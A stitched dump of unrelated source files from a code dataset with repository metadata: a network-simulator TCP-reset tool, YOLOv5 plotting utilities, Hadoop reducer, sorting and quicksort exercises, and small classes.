-i --id Required. Target node to block connections for. Find using
happy-node-list or happy-state.
--interface Target node interface to block connections for.
-s --start Time to initiate TCP block, in seconds from NOW
-d --duration Time to maintain TCP block, in seconds from <START_TIME>
--ips Source and destination IPs to block connections for.
--dstPort Destination port to block connections for.
Example:
$ happy-node-tcp-reset --id BorderRouter --interface wlan0 --start 2 --duration 20 --dstPort 11095
Kills the TCP connection for the BorderRouter node's wlan0 interface for 18 seconds.
return:
0 success
1 fail
"""
def __init__(self, opts=options):
HappyNode.__init__(self)
self.quiet = opts["quiet"]
self.node_id = opts["node_id"]
self.action = opts["action"]
self.interface = opts["interface"]
self.begin = opts["start"]
self.duration = opts["duration"]
self.ips = opts["ips"]
self.dstPort = opts["dstPort"]
def __pre_check(self):
# Check if the name of the node is given
if not self.node_id:
emsg = "Missing name of the virtual node that should join a network."
self.logger.error("[localhost] HappyNodeJoin: %s" % (emsg))
self.exit()
# Check if node exists
if not self._nodeExists():
emsg = "virtual node %s does not exist." % (self.node_id)
self.logger.error("[%s] HappyNodeJoin: %s" % (self.node_id, emsg))
self.exit()
def start_process(self, node_id, cmd, tag, quiet=None, strace=True):
emsg = "start_weave_process %s at %s node." % (tag, node_id)
self.logger.debug("[%s] process: %s" % (node_id, emsg))
options = happy.HappyProcessStart.option()
options["quiet"] = self.quiet
options["node_id"] = node_id
options["tag"] = tag
options["command"] = cmd
options["strace"] = True
proc = happy.HappyProcessStart.HappyProcessStart(options)
proc.run()
def __TcpResetConnection(self):
path = os.path.dirname(os.path.abspath(__file__))
cmd = "python " + path + "/HappyPacketProcess.py --interface %s --start %d --duration %d --action RESET " % \
(self.interface, self.begin, self.duration)
if self.ips is not None:
cmd += " --ips %s" % self.ips
if self.dstPort is not None:
cmd += " --dstPort %d" % self.dstPort
if self.quiet is True:
cmd += " --quiet"
cmd = self.runAsRoot(cmd)
self.start_process(node_id=self.node_id, cmd=cmd, tag="TcpReset")
def run(self):
self.__pre_check()
self.__TcpResetConnection()
return ReturnMsg(0)
| [
"rszewczyk@nestlabs.com"
] | rszewczyk@nestlabs.com |
b861a7633f17530727400e1200fced3dfdc1d7a0 | aae19ea6e93d753ce07562be7089703131d4c6d9 | /数据结构与算法/sortDict.py | 66a9fed94610b85c0e88f4b67efebf3200f44c16 | [] | no_license | Billpzoom/pythoncookbook | e4d85029826b57fd1b9506619be7420470731685 | ae021c3b5551d74fb0190a037eeed249800ece12 | refs/heads/master | 2022-11-17T21:17:03.441668 | 2020-07-24T06:35:08 | 2020-07-24T06:35:08 | 281,885,066 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 412 | py | rows = [
{'fname': 'Brian', 'lname': 'Jones', 'uid': 1003},
{'fname': 'David', 'lname': 'Beazley', 'uid': 1002},
{'fname': 'John', 'lname': 'Cleese', 'uid': 1001},
{'fname': 'Big', 'lname': 'Jones', 'uid': 1004}
]
from operator import itemgetter
rows_by_fname = sorted(rows, key=itemgetter('fname'))
rows_by_uid = sorted(rows,key=itemgetter('uid'))
print(rows_by_fname)
print(rows_by_uid) | [
"douzi0530@hotmail.com"
] | douzi0530@hotmail.com |
f4300b864a90d338308ffb2435af16c9b3283b39 | aee573c81dc297a97772b99cd90e05d494b25f77 | /learnpython/demo_ordinal_numbers.py | e89ba6bf760a49d3b327e40ef6923fe0ef782361 | [] | no_license | YuxuanSu-Sean/learning | 6df9d7b348e3f6c8cad0347e222c1ed244c92332 | 1356b85c2b673925f1fc89ff45f54fb499d342d0 | refs/heads/master | 2022-11-13T14:08:17.808037 | 2022-11-10T05:15:16 | 2022-11-10T05:15:16 | 204,625,964 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 291 | py | # 序数练习
numbers = list(range(1,10))
print(numbers)
for number in numbers:
if number == 1:
print(str(number) + "st")
elif number == 2:
print(str(number) + "nd")
elif number == 3:
print(str(number) + "rd")
else:
print(str(number) + "th") | [
"497572121@qq.com"
] | 497572121@qq.com |
f135199afee7f107d21a2bfe38d95e98e0ca3a85 | 81539aba88c22cf75bd2e14f5e0e92f2bf54e962 | /DarkMatterMap2017/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV_madgraph_mcatnlo_pythia8/TTbarDMJets_Dilepton_pseudoscalar_LO_Mchi-1_Mphi-250_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV_madgraph_mcatnlo_pythia8_260000_2_cff.py | 2cc85603244e7765849bf89b190cab40e038ff29 | [] | no_license | nistefan/RandomizedParametersSeparator | ad35b48b95e9745814c0bf9d8d8b6eb8aa479177 | 66a0e291b59113c6b5301768f1c10e36cf23d3c3 | refs/heads/master | 2021-01-03T00:41:17.415005 | 2020-02-19T13:30:54 | 2020-02-19T13:30:54 | 239,838,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,893 | py | import FWCore.ParameterSet.Config as cms
maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
readFiles = cms.untracked.vstring()
source = cms.Source ("PoolSource",fileNames = readFiles, lumisToProcess = cms.untracked.VLuminosityBlockRange(*('1:34673', '1:12127', '1:12785', '1:18734', '1:18816', '1:18193', '1:18352', '1:20878', '1:12449', '1:15269', '1:18521', '1:18538', '1:20793', '1:20820', '1:20840', '1:31324', '1:2919', '1:164', '1:26131', '1:26211', '1:29806', '1:9094', '1:9610', '1:27433', '1:25956', '1:27969', '1:25475', '1:25629', '1:25657', '1:25468', '1:25946', '1:25158', '1:27629', '1:30854', '1:30763', '1:26034', '1:6561', '1:8139', '1:26354', '1:33508', ))
)
readFiles.extend( ['/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/569B4D10-211C-EA11-A715-FA163E37F419.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/30550AAC-B81A-EA11-BAC1-0CC47A5FC2A1.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/2E4A544D-FB1C-EA11-976A-AC1F6BAC7C10.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/60FE314E-FF17-EA11-BF96-0025905C53A6.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/7461BAF6-B81A-EA11-B8C8-0242AC1C0502.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/281F6DB4-B81A-EA11-ABBF-FA163EB32F6D.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/68FB54A5-D319-EA11-9BF2-0CC47A2AED8A.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/D4CB8FB4-D419-EA11-8898-E0071B6C9DF0.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/44A61A10-EA1E-EA11-B484-AC1F6B1AF194.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/74DE8B80-0B18-EA11-9093-3CFDFE63F840.root']); | [
"Nicole.Stefanov@cern.ch"
] | Nicole.Stefanov@cern.ch |
76940cff3904834ea315fb5a14390903b58323f3 | 2943da112999b225beb79eedcf1c5b450c7674f6 | /powercell_model/YOLOv5_Trained_Model/utils/plots.py | b6cb104359b06ee37351dad61106c2ecf9468b63 | [] | no_license | cavineers/Vision2021 | b2723d8575bf4a6d11b4047e418c7ae8781c5553 | 428f238ababd2f46bf0f1520588b62ac332c5e57 | refs/heads/main | 2023-03-14T18:51:33.163852 | 2021-03-27T19:01:23 | 2021-03-27T19:01:23 | 331,004,551 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 15,999 | py | # Plotting utils
import glob
import os
import random
import asyncio
from copy import copy
from pathlib import Path
import cv2
import math
from math import atan2, degrees
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import torch
import yaml
from PIL import Image, ImageDraw
from scipy.signal import butter, filtfilt
from utils.general import xywh2xyxy, xyxy2xywh
from utils.metrics import fitness
from encodings import undefined
# Settings
matplotlib.rc('font', **{'size': 11})
matplotlib.use('Agg') # for writing to files only
def color_list():
# Return first 10 plt colors as (r,g,b) https://stackoverflow.com/questions/51350872/python-from-color-name-to-rgb
def hex2rgb(h):
return tuple(int(h[1 + i:1 + i + 2], 16) for i in (0, 2, 4))
return [hex2rgb(h) for h in plt.rcParams['axes.prop_cycle'].by_key()['color']]
def hist2d(x, y, n=100):
# 2d histogram used in labels.png and evolve.png
xedges, yedges = np.linspace(x.min(), x.max(), n), np.linspace(y.min(), y.max(), n)
hist, xedges, yedges = np.histogram2d(x, y, (xedges, yedges))
xidx = np.clip(np.digitize(x, xedges) - 1, 0, hist.shape[0] - 1)
yidx = np.clip(np.digitize(y, yedges) - 1, 0, hist.shape[1] - 1)
return np.log(hist[xidx, yidx])
def butter_lowpass_filtfilt(data, cutoff=1500, fs=50000, order=5):
# https://stackoverflow.com/questions/28536191/how-to-filter-smooth-with-scipy-numpy
def butter_lowpass(cutoff, fs, order):
nyq = 0.5 * fs
normal_cutoff = cutoff / nyq
return butter(order, normal_cutoff, btype='low', analog=False)
b, a = butter_lowpass(cutoff, fs, order=order)
return filtfilt(b, a, data) # forward-backward filter
def plot_one_box(x, img, color=None, label=None, line_thickness=None):
# Plots one bounding box on image img
tl = line_thickness or round(0.002 * (img.shape[0] + img.shape[1]) / 2) + 1 # line/font thickness
color = color or [random.randint(0, 255) for _ in range(3)]
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3])) # x[0] = left line; x[1] = top line; x[2] = right line; x[3] = bottom line;
width = int(x[2]) - int(x[0])
height = int(x[3]) - int(x[1])
cv2.circle(img, (int(1920 / 2), int(1080 / 2)), 10, [255,255,255], -1)
cv2.circle(img, (int(x[2]) + int(-width / 2),int(x[3]) + int(-height / 2)), 10, [0,0,255], -1)
cv2.rectangle(img, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)
if label:
print(label)
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(img, c1, c2, color, -1, cv2.LINE_AA) # filled
cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
def plot_wh_methods(): # from utils.plots import *; plot_wh_methods()
# Compares the two methods for width-height anchor multiplication
# https://github.com/ultralytics/yolov3/issues/168
x = np.arange(-4.0, 4.0, .1)
ya = np.exp(x)
yb = torch.sigmoid(torch.from_numpy(x)).numpy() * 2
fig = plt.figure(figsize=(6, 3), dpi=150)
plt.plot(x, ya, '.-', label='YOLOv3')
plt.plot(x, yb ** 2, '.-', label='YOLOv5 ^2')
plt.plot(x, yb ** 1.6, '.-', label='YOLOv5 ^1.6')
plt.xlim(left=-4, right=4)
plt.ylim(bottom=0, top=6)
plt.xlabel('input')
plt.ylabel('output')
plt.grid()
plt.legend()
fig.tight_layout()
fig.savefig('comparison.png', dpi=200)
def output_to_target(output):
# Convert model output to target format [batch_id, class_id, x, y, w, h, conf]
targets = []
for i, o in enumerate(output):
for *box, conf, cls in o.cpu().numpy():
targets.append([i, cls, *list(*xyxy2xywh(np.array(box)[None])), conf])
return np.array(targets)
def plot_images(images, targets, paths=None, fname='images.jpg', names=None, max_size=640, max_subplots=16):
# Plot image grid with labels
if isinstance(images, torch.Tensor):
images = images.cpu().float().numpy()
if isinstance(targets, torch.Tensor):
targets = targets.cpu().numpy()
# un-normalise
if np.max(images[0]) <= 1:
images *= 255
tl = 3 # line thickness
tf = max(tl - 1, 1) # font thickness
bs, _, h, w = images.shape # batch size, _, height, width
bs = min(bs, max_subplots) # limit plot images
ns = np.ceil(bs ** 0.5) # number of subplots (square)
# Check if we should resize
scale_factor = max_size / max(h, w)
if scale_factor < 1:
h = math.ceil(scale_factor * h)
w = math.ceil(scale_factor * w)
colors = color_list() # list of colors
mosaic = np.full((int(ns * h), int(ns * w), 3), 255, dtype=np.uint8) # init
for i, img in enumerate(images):
if i == max_subplots: # if last batch has fewer images than we expect
break
block_x = int(w * (i // ns))
block_y = int(h * (i % ns))
img = img.transpose(1, 2, 0)
if scale_factor < 1:
img = cv2.resize(img, (w, h))
mosaic[block_y:block_y + h, block_x:block_x + w, :] = img
if len(targets) > 0:
image_targets = targets[targets[:, 0] == i]
boxes = xywh2xyxy(image_targets[:, 2:6]).T
classes = image_targets[:, 1].astype('int')
labels = image_targets.shape[1] == 6 # labels if no conf column
conf = None if labels else image_targets[:, 6] # check for confidence presence (label vs pred)
if boxes.shape[1] and boxes.max() <= 1: # if normalized
boxes[[0, 2]] *= w # scale to pixels
boxes[[1, 3]] *= h
boxes[[0, 2]] += block_x
boxes[[1, 3]] += block_y
for j, box in enumerate(boxes.T):
cls = int(classes[j])
color = colors[cls % len(colors)]
cls = names[cls] if names else cls
if labels or conf[j] > 0.25: # 0.25 conf thresh
label = '%s' % cls if labels else '%s %.1f' % (cls, conf[j])
plot_one_box(box, mosaic, label=label, color=color, line_thickness=tl)
# Draw image filename labels
if paths:
label = Path(paths[i]).name[:40] # trim to 40 char
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
cv2.putText(mosaic, label, (block_x + 5, block_y + t_size[1] + 5), 0, tl / 3, [220, 220, 220], thickness=tf,
lineType=cv2.LINE_AA)
# Image border
cv2.rectangle(mosaic, (block_x, block_y), (block_x + w, block_y + h), (255, 255, 255), thickness=3)
if fname:
r = min(1280. / max(h, w) / ns, 1.0) # ratio to limit image size
mosaic = cv2.resize(mosaic, (int(ns * w * r), int(ns * h * r)), interpolation=cv2.INTER_AREA)
# cv2.imwrite(fname, cv2.cvtColor(mosaic, cv2.COLOR_BGR2RGB)) # cv2 save
Image.fromarray(mosaic).save(fname) # PIL save
return mosaic
def plot_lr_scheduler(optimizer, scheduler, epochs=300, save_dir=''):
# Plot LR simulating training for full epochs
optimizer, scheduler = copy(optimizer), copy(scheduler) # do not modify originals
y = []
for _ in range(epochs):
scheduler.step()
y.append(optimizer.param_groups[0]['lr'])
plt.plot(y, '.-', label='LR')
plt.xlabel('epoch')
plt.ylabel('LR')
plt.grid()
plt.xlim(0, epochs)
plt.ylim(0)
plt.tight_layout()
plt.savefig(Path(save_dir) / 'LR.png', dpi=200)
def plot_test_txt(): # from utils.plots import *; plot_test()
# Plot test.txt histograms
x = np.loadtxt('test.txt', dtype=np.float32)
box = xyxy2xywh(x[:, :4])
cx, cy = box[:, 0], box[:, 1]
fig, ax = plt.subplots(1, 1, figsize=(6, 6), tight_layout=True)
ax.hist2d(cx, cy, bins=600, cmax=10, cmin=0)
ax.set_aspect('equal')
plt.savefig('hist2d.png', dpi=300)
fig, ax = plt.subplots(1, 2, figsize=(12, 6), tight_layout=True)
ax[0].hist(cx, bins=600)
ax[1].hist(cy, bins=600)
plt.savefig('hist1d.png', dpi=200)
def plot_targets_txt(): # from utils.plots import *; plot_targets_txt()
# Plot targets.txt histograms
x = np.loadtxt('targets.txt', dtype=np.float32).T
s = ['x targets', 'y targets', 'width targets', 'height targets']
fig, ax = plt.subplots(2, 2, figsize=(8, 8), tight_layout=True)
ax = ax.ravel()
for i in range(4):
ax[i].hist(x[i], bins=100, label='%.3g +/- %.3g' % (x[i].mean(), x[i].std()))
ax[i].legend()
ax[i].set_title(s[i])
plt.savefig('targets.jpg', dpi=200)
def plot_study_txt(path='', x=None): # from utils.plots import *; plot_study_txt()
# Plot study.txt generated by test.py
fig, ax = plt.subplots(2, 4, figsize=(10, 6), tight_layout=True)
ax = ax.ravel()
fig2, ax2 = plt.subplots(1, 1, figsize=(8, 4), tight_layout=True)
for f in [Path(path) / f'study_coco_{x}.txt' for x in ['yolov5s', 'yolov5m', 'yolov5l', 'yolov5x']]:
y = np.loadtxt(f, dtype=np.float32, usecols=[0, 1, 2, 3, 7, 8, 9], ndmin=2).T
x = np.arange(y.shape[1]) if x is None else np.array(x)
s = ['P', 'R', 'mAP@.5', 'mAP@.5:.95', 't_inference (ms/img)', 't_NMS (ms/img)', 't_total (ms/img)']
for i in range(7):
ax[i].plot(x, y[i], '.-', linewidth=2, markersize=8)
ax[i].set_title(s[i])
j = y[3].argmax() + 1
ax2.plot(y[6, :j], y[3, :j] * 1E2, '.-', linewidth=2, markersize=8,
label=f.stem.replace('study_coco_', '').replace('yolo', 'YOLO'))
ax2.plot(1E3 / np.array([209, 140, 97, 58, 35, 18]), [34.6, 40.5, 43.0, 47.5, 49.7, 51.5],
'k.-', linewidth=2, markersize=8, alpha=.25, label='EfficientDet')
ax2.grid()
ax2.set_xlim(0, 30)
ax2.set_ylim(28, 50)
ax2.set_yticks(np.arange(30, 55, 5))
ax2.set_xlabel('GPU Speed (ms/img)')
ax2.set_ylabel('COCO AP val')
ax2.legend(loc='lower right')
plt.savefig('test_study.png', dpi=300)
def plot_labels(labels, save_dir=''):
# plot dataset labels
c, b = labels[:, 0], labels[:, 1:].transpose() # classes, boxes
nc = int(c.max() + 1) # number of classes
colors = color_list()
# seaborn correlogram
try:
import seaborn as sns
import pandas as pd
x = pd.DataFrame(b.transpose(), columns=['x', 'y', 'width', 'height'])
sns.pairplot(x, corner=True, diag_kind='hist', kind='scatter', markers='o',
plot_kws=dict(s=3, edgecolor=None, linewidth=1, alpha=0.02),
diag_kws=dict(bins=50))
plt.savefig(Path(save_dir) / 'labels_correlogram.png', dpi=200)
plt.close()
except Exception as e:
pass
# matplotlib labels
ax = plt.subplots(2, 2, figsize=(8, 8), tight_layout=True)[1].ravel()
ax[0].hist(c, bins=np.linspace(0, nc, nc + 1) - 0.5, rwidth=0.8)
ax[0].set_xlabel('classes')
ax[2].scatter(b[0], b[1], c=hist2d(b[0], b[1], 90), cmap='jet')
ax[2].set_xlabel('x')
ax[2].set_ylabel('y')
ax[3].scatter(b[2], b[3], c=hist2d(b[2], b[3], 90), cmap='jet')
ax[3].set_xlabel('width')
ax[3].set_ylabel('height')
# rectangles
labels[:, 1:3] = 0.5 # center
labels[:, 1:] = xywh2xyxy(labels[:, 1:]) * 2000
img = Image.fromarray(np.ones((2000, 2000, 3), dtype=np.uint8) * 255)
for cls, *box in labels[:1000]:
ImageDraw.Draw(img).rectangle(box, width=1, outline=colors[int(cls) % 10]) # plot
ax[1].imshow(img)
ax[1].axis('off')
for a in [0, 1, 2, 3]:
for s in ['top', 'right', 'left', 'bottom']:
ax[a].spines[s].set_visible(False)
plt.savefig(Path(save_dir) / 'labels.png', dpi=200)
plt.close()
def plot_evolution(yaml_file='data/hyp.finetune.yaml'): # from utils.plots import *; plot_evolution()
# Plot hyperparameter evolution results in evolve.txt
with open(yaml_file) as f:
hyp = yaml.load(f, Loader=yaml.FullLoader)
x = np.loadtxt('evolve.txt', ndmin=2)
f = fitness(x)
# weights = (f - f.min()) ** 2 # for weighted results
plt.figure(figsize=(10, 12), tight_layout=True)
matplotlib.rc('font', **{'size': 8})
for i, (k, v) in enumerate(hyp.items()):
y = x[:, i + 7]
# mu = (y * weights).sum() / weights.sum() # best weighted result
mu = y[f.argmax()] # best single result
plt.subplot(6, 5, i + 1)
plt.scatter(y, f, c=hist2d(y, f, 20), cmap='viridis', alpha=.8, edgecolors='none')
plt.plot(mu, f.max(), 'k+', markersize=15)
plt.title('%s = %.3g' % (k, mu), fontdict={'size': 9}) # limit to 40 characters
if i % 5 != 0:
plt.yticks([])
print('%15s: %.3g' % (k, mu))
plt.savefig('evolve.png', dpi=200)
print('\nPlot saved as evolve.png')
def plot_results_overlay(start=0, stop=0): # from utils.plots import *; plot_results_overlay()
# Plot training 'results*.txt', overlaying train and val losses
s = ['train', 'train', 'train', 'Precision', 'mAP@0.5', 'val', 'val', 'val', 'Recall', 'mAP@0.5:0.95'] # legends
t = ['Box', 'Objectness', 'Classification', 'P-R', 'mAP-F1'] # titles
for f in sorted(glob.glob('results*.txt') + glob.glob('../../Downloads/results*.txt')):
results = np.loadtxt(f, usecols=[2, 3, 4, 8, 9, 12, 13, 14, 10, 11], ndmin=2).T
n = results.shape[1] # number of rows
x = range(start, min(stop, n) if stop else n)
fig, ax = plt.subplots(1, 5, figsize=(14, 3.5), tight_layout=True)
ax = ax.ravel()
for i in range(5):
for j in [i, i + 5]:
y = results[j, x]
ax[i].plot(x, y, marker='.', label=s[j])
# y_smooth = butter_lowpass_filtfilt(y)
# ax[i].plot(x, np.gradient(y_smooth), marker='.', label=s[j])
ax[i].set_title(t[i])
ax[i].legend()
ax[i].set_ylabel(f) if i == 0 else None # add filename
fig.savefig(f.replace('.txt', '.png'), dpi=200)
def plot_results(start=0, stop=0, bucket='', id=(), labels=(), save_dir=''):
# Plot training 'results*.txt'. from utils.plots import *; plot_results(save_dir='runs/train/exp')
fig, ax = plt.subplots(2, 5, figsize=(12, 6))
ax = ax.ravel()
s = ['Box', 'Objectness', 'Classification', 'Precision', 'Recall',
'val Box', 'val Objectness', 'val Classification', 'mAP@0.5', 'mAP@0.5:0.95']
if bucket:
# files = ['https://storage.googleapis.com/%s/results%g.txt' % (bucket, x) for x in id]
files = ['results%g.txt' % x for x in id]
c = ('gsutil cp ' + '%s ' * len(files) + '.') % tuple('gs://%s/results%g.txt' % (bucket, x) for x in id)
os.system(c)
else:
files = list(Path(save_dir).glob('results*.txt'))
assert len(files), 'No results.txt files found in %s, nothing to plot.' % os.path.abspath(save_dir)
for fi, f in enumerate(files):
try:
results = np.loadtxt(f, usecols=[2, 3, 4, 8, 9, 12, 13, 14, 10, 11], ndmin=2).T
n = results.shape[1] # number of rows
x = range(start, min(stop, n) if stop else n)
for i in range(10):
y = results[i, x]
if i in [0, 1, 2, 5, 6, 7]:
y[y == 0] = np.nan # don't show zero loss values
# y /= y[0] # normalize
label = labels[fi] if len(labels) else f.stem
ax[i].plot(x, y, marker='.', label=label, linewidth=2, markersize=8)
ax[i].set_title(s[i])
# if i in [5, 6, 7]: # share train and val loss y axes
# ax[i].get_shared_y_axes().join(ax[i], ax[i - 5])
except Exception as e:
print('Warning: Plotting error for %s; %s' % (f, e))
fig.tight_layout()
ax[1].legend()
fig.savefig(Path(save_dir) / 'results.png', dpi=200)
| [
"rbcrusher88@gmail.com"
] | rbcrusher88@gmail.com |
8be0c13f568672f1cfab78e12f0686636882f2eb | 88abb6486b37bb413152a4feea308249d3a0c250 | /pyxtalcomp/xtalcomp_ase_atoms.py | e3154c39a423cc188a07bdac511c9343979c78f9 | [] | no_license | davidkleiven/PyXTalComp | ca81b1654c6108bfd37005b67e2d3974443c83a9 | a82128edb079baf7d846d9094bd5f5f6f8258fcc | refs/heads/master | 2021-06-05T20:03:22.187463 | 2018-12-08T12:06:51 | 2018-12-08T12:06:51 | 135,704,484 | 0 | 1 | null | 2020-09-18T09:53:57 | 2018-06-01T10:30:54 | C++ | UTF-8 | Python | false | false | 658 | py | from pyxtalcomp_cpp import compare_xtalcomp
class XtalCompASE(object):
def __init__(self):
pass
def __call__(self, atom1, atom2, cart_tol=0.05, angle_tol=0.5, reduce_cell=False):
"""Compare two ASE atoms"""
positions1 = atom1.get_scaled_positions()
symbs1 = [atom.symbol for atom in atom1]
cell1 = atom1.get_cell()
positions2 = atom2.get_scaled_positions()
symbs2 = [atom.symbol for atom in atom2]
cell2 = atom2.get_cell()
match = compare_xtalcomp(positions1,symbs1, cell1,
positions2, symbs2, cell2, cart_tol, angle_tol, reduce_cell)
return match
| [
"david.kleiven@ntnu.no"
] | david.kleiven@ntnu.no |
cc88115e578eddbca428099c5e90c28ab4847a19 | 3f93a0c460ab63d6723103ec7bc7bc125612ebd2 | /plugin/gestureLogic/__init__.py | b8219e39c0bce95c10497c8c06a050525d91c1c5 | [] | no_license | umlfri-old/addon_gestures | 88eb85473739b719e8f93b894c395a208594c3a4 | 3d85b8a7c463e1ca06c1e9048aa41482d74f5c78 | refs/heads/master | 2021-01-20T16:35:41.118668 | 2011-03-20T19:28:53 | 2011-03-20T19:28:53 | 90,841,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 343 | py | from GestureManager import CGestureManager
from BoundaryAlgorithm import CBoundaryAlgorithm
from GestureAlgorithm import CGestureAlgorithm
from Gesture import CGesture
from GestureSet import CGestureSet
from BoundaryGestureSet import CBoundaryGestureSet
from Description import CDescription
from BoundaryDescription import CBoundaryDescription | [
"pasikavec@gmail.com"
] | pasikavec@gmail.com |
c30bbbd1ae28a9ed226b15e3271a86f48540e282 | 709d626f7ee134756a1db1ca4c3c94e9049b7e6d | /moviewebsite/domainmodel/director.py | 09e481fe419fea2cce52628b981ea38b7e2484ca | [] | no_license | amieldelatorre/MovieWebsite | f0b0ed4362c84902d26d74a8bb341228a614deb8 | f4171ee9d6be6409ac688a904fea65b414875125 | refs/heads/main | 2023-02-04T13:39:28.628131 | 2020-12-24T02:28:42 | 2020-12-24T02:28:42 | 318,486,567 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 714 | py | class Director:
def __init__(self, full_name: str):
if full_name == "" or type(full_name) is not str:
self.__full_name = None
else:
self.__full_name = full_name.strip()
@property
def full_name(self) -> str:
return self.__full_name
def __repr__(self):
return f"<Director {self.__full_name}>"
def __eq__(self, other):
if self.__full_name == other.__full_name:
return True
else:
return False
def __lt__(self, other):
if self.__full_name < other.__full_name:
return True
else:
return False
def __hash__(self):
return hash(self.__full_name)
| [
"amieljames.delatorre@gmail.com"
] | amieljames.delatorre@gmail.com |
489389020069f65eb4be1020ec10e8c44a59df25 | d88d7dfc8bf80b170babee6c70105ff0a1a05e18 | /lesson_4/combine_datasets_reducer.py | 83304e8dbdab3dc4df295aff7f194d3e716f5ef4 | [] | no_license | robertowm/udacity-hadoop | 0bbd706b523af29cb9767bdedd8293298c7cb69f | 44f4edfc988be863e80a5c1bfbacec341c393ada | refs/heads/master | 2020-05-19T23:10:22.825242 | 2014-09-27T01:10:01 | 2014-09-27T01:10:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 930 | py | #!/usr/bin/python
# Here you will be able to combine the values that come from 2 sources
# Value that starts with A will be the user data
# Values that start with B will be forum node data
import sys
import csv
def reducer():
user_ptr_id = None
aCode = None
reputation = None
gold = None
silver = None
bronze = None
reader = csv.reader(sys.stdin, delimiter='\t')
writer = csv.writer(sys.stdout, delimiter='\t', quotechar='"', quoting=csv.QUOTE_ALL)
for line in reader:
if line[1] == "A":
user_ptr_id, aCode, reputation, gold, silver, bronze = line
elif user_ptr_id != None:
author_id, bCode, id, title, tagnames, node_type, parent_id, abs_parent_id, added_at, score = line
if user_ptr_id == author_id:
output = [id, title, tagnames, author_id, node_type, parent_id, abs_parent_id, added_at, score, reputation, gold, silver, bronze]
writer.writerow(output)
reducer() | [
"robertowm@gmail.com"
] | robertowm@gmail.com |
cf6b5c3cf8eab870142880ad20aef61977195e4d | 290a42cc6db9d6ec778b20afbd730f6fd463b8ad | /CS1/Labs/Lab 3/quicksort.py | 3a3b63a03d3ff264f275ab6d86de0568933046cf | [] | no_license | sdberthoud/linkedin | ceed63dd4e54ed0438e87f5c53dd8b03ae23c429 | 85279363a61b82c58fe011569dc220fb857bd2e5 | refs/heads/master | 2021-07-10T11:27:07.539040 | 2017-10-12T02:53:42 | 2017-10-12T02:53:42 | 106,635,433 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,996 | py | '''
filename: quicksort.py
name: shane berthoud
date: november 4th 2014
course: cs 1
purpose: to write the sort function and all of the other functions that come with it.'''
from string import lower
def partition(the_list, p, r, compare_func):
'''the partition function that checks if the values in the list are greater than or less than the last item in the list and puts them to the right or left of it respectively'''
pivot = the_list[r] # sets the variables that run the function
i = p - 1
j = p
while j < r: # makes sure that this does not happen when j = r. if the item at index j is less than the pivot it swaps the position of i and j, if its greater it just increments j.
if compare_func(the_list[j], pivot):
i += 1
swap(the_list, i, j)
j += 1
swap(the_list, i+1, r) # swaps the item at the index i + 1 which is greater than r with r so the left side of the itemthat was at index r is less than it, and the right side is greater.
return i+1
def swap(the_list, i, j):
'''a function to swap the items at indices i and j'''
temp = the_list[i]
